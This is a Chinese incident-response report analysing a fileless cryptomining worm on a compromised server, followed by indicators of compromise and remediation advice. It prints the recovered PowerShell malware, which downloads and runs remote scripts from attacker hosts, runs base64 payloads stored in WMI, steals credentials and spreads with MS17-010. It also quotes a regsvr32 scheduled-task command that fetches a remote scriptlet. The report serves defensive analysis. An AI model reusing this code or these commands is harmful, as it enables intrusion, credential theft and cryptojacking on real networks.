1){        if ($avgs[1] -ne 0){            if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){                $nic = $se[0]                break            }else{                $nic = $se[1]                break            }        }    }    if ($i -eq 2){        if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){            $nic = $se[2]            break        }    }    if ($i -eq 3){        if ($avgs[3] -ne 0){            if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){                $nic = $se[2]                break            }else{                $nic = $se[3]                break            }        }    }}//如果服务端版本不等于本地端版本，则下载服务端的antivirus.ps1$nic=$nic+(':'+'443')$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()if($ver -ne $null){    $ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value    if($ver -ne $ver_tmp){        IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")        return    }}//获取开机时间并进行定义$stime=[Environment]::TickCount//执行WmiClass里root\default:System_Anti_Virus_Core-"funs"属性内容，释放WMI exec和永恒之蓝攻击代码$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))iex $defun//在wmi对象里查找root\subscription空间，定位windows系统日志，删除Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject//按cpu大小递减方式逐个获取powershell.exe进程ID[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}$tcpconn = netstat -anop tcp$exist=$False//判断本机是否在给自己挖矿，例如已运行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP连接，否则循环if ($psids -ne $null ){    foreach ($t in $tcpconn)    {        $line =$t.split(' ')|?{$_}        if ($line -eq $null)        {continue}        if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )        {            $exist=$true            break        }    }}！！！RunDDOS "cohernece.exe"KillBot('System_Anti_Virus_Core')//杀掉其他挖矿程序，例如与外部端口3333，55555，7777已建立连接的挖矿程序foreach ($t in $tcpconn)    {        $line =$t.split(' ')|?{$_}        if (!($line -is[array])){continue}        if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))        {            $evid=$line[-1]            Get-Process -id $evid| stop-process -force        }    }//如果没有挖矿，例如本机没有连接外部14444或14433端口和已运行powershell.exe小于8个，执行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"属性内容进行挖矿和内网渗透。if (!$exist -and ($psids.count -le 8)){    $cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""    $vbs = New-Object -ComObjectWScript.Shell    $vbs.run($cmdmon,0)}//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"属性内容赋给$mimi，并检查长度是否32位，如果不是将该内容输出至temp\a25hY2tlcmVk.txt文件$NTLM=$False$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value$a, $NTLM= Get-creds $mimi $mimiif (($a -Split " ")[2].length -ne 32){    ($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"}$Networks = [System.Net.DNS]::GetHostByName($null).AddressList//将"ipsu"属性内容赋值给$ipsu$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value//将"i17"属性内容赋值给$i17$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value//将"sc"属性内容赋值给$scba$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value//将"sc"属性内容转换成8位无符号整数数组[byte[]]$sc=[System.Convert]::FromBase64String($scba)foreach ($Network in $Networks){//格式化IP地址    $IPAddress  = $Network.IPAddressToString//判断自身IP地址是否为空    if ($IPAddress -match'^169.254'){continue}    $SubnetMask  = '255.255.255.0'//将Get-networkrange到的IP和掩码赋值给$ips_c    $ips_c=Get-networkrange$IPAddress $SubnetMask//将Get-IpInB到的IP赋值给$ips_b    $ips_b=Get-IpInB $IPAddress    $ips=$ips_c+$ips_b    $tcpconn = netstat -anop tcp//取tcp连接是已建立状态且不包含127.0.0.1，并不是自己连自己，最后类似入栈行为    foreach ($t in $tcpconn)    {        $line =$t.split(' ')|?{$_}        if (!($line -is[array])){continue}        if ($line.count -le4){continue}//分割外部地址并只取IP        $i=$line[-3].split(':')[0]//如果tcp连接是已建立状态且不包含127.0.0.1，并不是自己连自己则继续        if ( ($line[-2] -eq'ESTABLISHED') -and  ($i -ne '127.0.0.1')-and ($ips -notcontains $i))        {            $ips+=$i        }    }//如果开机时间小于1.5个小时则继续    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}    foreach ($ip in $ips)    {        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}        if ($ip -eq$IPAddress){continue}//MS17-010永恒之蓝攻击                if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)        {            $re=0            if ($a.count -ne 0)            {$re = test-ip -ip $ip-creds $a  -nic $nic -ntlm $NTLM }            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}            else            {                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)                if ($vul -and $i17-notcontains $ip)                {                   $res=eb7 $ip $sc                   if (!($res -eq$true))                   {eb8 $ip $sc}                   $i17 = $i17 +" "+$ip                }            }        }    } }//赋值给staticClass$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')//wmiexec攻击成功的失陷主机IP赋值给StaticClass的ipsu$StaticClass.SetPropertyValue('ipsu' ,$ipsu)//推送更新$StaticClass.Put()//永恒之蓝攻击成功将失陷主机IP赋值给StaticClass的i17$StaticClass.SetPropertyValue('i17' ,$i17)//推送更新$StaticClass.Put()

2.8 powershell.exe（PID 3180）

内容和上一个powershell载荷重复，详见目录2.7。

2.9 WmiClass检查

根据分析PID 3964内存中的内容，发现各种恶意内容都储存在WMI root\default:System_Anti_Virus_Core中，如需要调用，也是直接加载到内存中执行，即实现本地无文件挖矿和内网渗透。

Windows自带wbemtest.exe工具可以管理Windows Management Instrumentation。

下拉框至最底部，发现PID 3964内存数据中存在的各个属性。

2.9.1 ver属性（由于不会代码，以下部分内容从数据包层面进行功能验证）

查询DNS记录，并ping测试服务端在线情况。

数据包显示第一个动作即是验证版本，如版本不一致即下载antivirus.ps1。

更新完成之后服务端和本地端版本一致。

服务端版本

本地版本

2.9.2 funs属性

对funs内容进行解码并上传云端进行杀毒。

2.9.3 ipsu/i17/mimi/sc属性

ipsu和i17由于wmiexec和MS17-010没有攻击成功所以属性没有赋值。

mimi和sc由于技术有限，未继续进行分析。

2.9.4 mon属性

技术有限，未在代码层面进行分析，PID 3180会释放mon内容进行挖矿行为。

2.9.5 内网渗透

根据PID 3964和PID 3180内存中的数据，分析两个程序都会释放funs内容以进行内网渗透。

从ARP层面判断存活主机：

从TCP三次握手机制判断目标范围内的445端口是否开启：

2.10 antivirus.ps1检查

由于PID 3964 get该文件并加载到内存后没有存储行为，且利用浏览器使用相同的请求头部也无法下载该文件，导致无法继续分析（后来发现在命令行中运行然后重定向到文件中即可对其进行分析）。根据该进程判断该文件至少包括修改WmiClass、下载cohernece.exe等恶意程序的功能。

2.11 cohernece.exe检查

该文件2019年1月12日1:30生成。

同目录下还存在java-log-9527.log，经查阅资料，该文件是cohernece.exe的攻击载荷。

2.12 关联检查

根据名称进行搜索。发现多个目录下存在该文件。如下图红框所示：

根据该文件生成时间进行搜索，同一时间在极其隐蔽的目录下：

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5

每隔20分钟就会自动生成一个htm文件。

对其进行解码，如下图所示，按名称理解主要作用于检查版本或本地/云端版本不一致时进行更新。

下载内容如下简示：

由于其生成时间固定，查询到任务计划时发现恶意定时任务：

两个任务计划定时操作：

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

如上链接测试无法下载，80替换443后可以下载。

2.13 Ioc

2.13.1 url

update.7h4uk.com

info.7h4uk.com

f4keu.7h4uk.com

xmr-eu1.nanopool.org

2.13.2 ip

185.234.217.139

185.234.217.111

111.90.145.52

151.80.144.25

51.255.34.118

51.15.65.182

164.132.109.110

213.32.29.143

51.15.54.102

51.15.78.68

5.196.13.29

217.182.169.148

5.196.23.240

2.13.3 md5

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8

9527.log c2e31d4b8d6f9169d4557587b9d595ec

三、应急处置

根据现场情况经用户沟通确认，通过内网主机进行以下工作完成了对恶意程序的清除：

1.任务计划删除定时任务；

2.按顺序kill PID 3964、3180和cohernece.exe；

3.已在WMI中将root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver属性删除；

4.已删除cohernece.exe和antivirus*.htm。

四、基础防护能力检查

4.1 防火墙和MS17010

在本地未安装MS17010相关补丁的情况下对外开放了445端口，且无第三方杀软或应用层防火墙，本地网络层防火墙未启用，无法针对入栈访问本地高危端口行为进行访问控制。

4.2 Tomcat日志

Tomcat访问日志功能未启用。

五、分析结论和处理建议

5.1 分析结论

本次内网主机CPU使用率过高经检查是因为存在挖矿行为导致，由于tomcat未启用访问日志记录功能，未在WEB层面进行攻击溯源。但根据目录4.1的分析，完全可以通过目录2中的恶意程序对内网防护不到位的主机实现自动化内网渗透。

5.2 处理建议

为减少被恶意行为取得管理权限后进行勒索或挖矿等发生安全事件的可能性，建议至少包括但不限于：

1.加强准入控制，访问应用系统建议必须经过多层应用防护；

2.内网管理服务器建议必须经过堡垒机管控和审计，外网管理服务器建议必须通过VPN加密进入内网后再通过堡垒机进行管控和审计；

3.加强准出控制，建议对互联网或对外提供服务的应用系统，在互联网出口只做端口映射或双向地址置换，如无必要，建议禁止互联网出口代理应用系统的IP出互联网；

4.应用系统建议经过代码审计和渗透测试后再对互联网或对外提供服务；

5.建议不要因为是测试服务器而降低其安全标准，基于木桶原理，以防测试服务器发生安全事件被获取权限从而可以横向渗透内网，因此再次强调业务系统服务器如无必要，禁止主动访问互联网，以防获取管理权限后反弹管理权限至互联网；

6.办公终端需预防U盘钓鱼或交叉感染恶意程序，尽量不要打开来历不明的文档、程序、邮件中的附件，防止社工钓鱼。

*本文原创作者：竹林再遇北极熊，本文属于FreeBuf原创奖励计划，未经许可禁止转载